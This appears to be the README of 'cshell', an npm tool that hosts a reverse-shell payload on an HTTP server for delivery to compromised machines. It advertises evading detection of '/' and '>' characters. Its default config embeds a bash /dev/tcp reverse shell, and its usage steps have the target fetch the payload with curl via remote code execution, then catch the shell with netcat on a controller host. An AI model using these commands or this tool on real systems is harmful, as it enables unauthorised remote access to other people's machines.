This program could attach the file to the root path of the HTTP server.
- Bypass
/and>detection and bounce the shell - Use-friendly and highly customized cli tool
Run
npm i -g cshellUse
cshellFor more help, please try cshell --help.
Enter the source code directory. Install the dependencies.
npm ciInstall the cli tool globally.
npm linkThen you can directly use it on console every where. Try:
cshellFor more help, please try cshell --help.
It is recommended to initialize the config by running following command.
cshell-conf <path><path> refers to the config. Each KV is optional, and it will fallback to the default value.
Default config file is as followings.
{
// http server to visit
"server-host": "127.0.0.1",
"server-port": 54180,
// master controller
"shell-host": "127.0.0.1",
"shell-port": 54188,
// static directory
"static": "",
// file path whose content is attached
"file": "",
// content type of the file
"content-type": "text/plain",
// which content if file is not specified
"default-file-content": "bash -i &> /dev/tcp/${{ env.shell_host }}/${{ env.shell_port }} 0>&1"
}Note that ${{ something }} in the file content will be replaced to corresponding values. Specially, env has following sub-values:
server_hostserver_portshell_portshell_port
Run
cshell --host 12.34.56.78 --port 2020Show
Server is running at port 2020...
- Try curl -o shell.sh 12.34.56.78:2020 on the target machine.
- Try nc -lvp 2020 on the master controller (12.34.56.78).
DO NOT forget to quit this process!!!
On the target machine to attack, run curl -o shell.sh 12.34.56.78:2020 via RCE. On console displays GET / FROM xx.xx.xx.xx.
Then we press Ctrl+C to quit the program and run nc -lvp 2020 on the master controller.
Attack the target machine by running bash shell.sh via RCE and we get the shell on the master controller.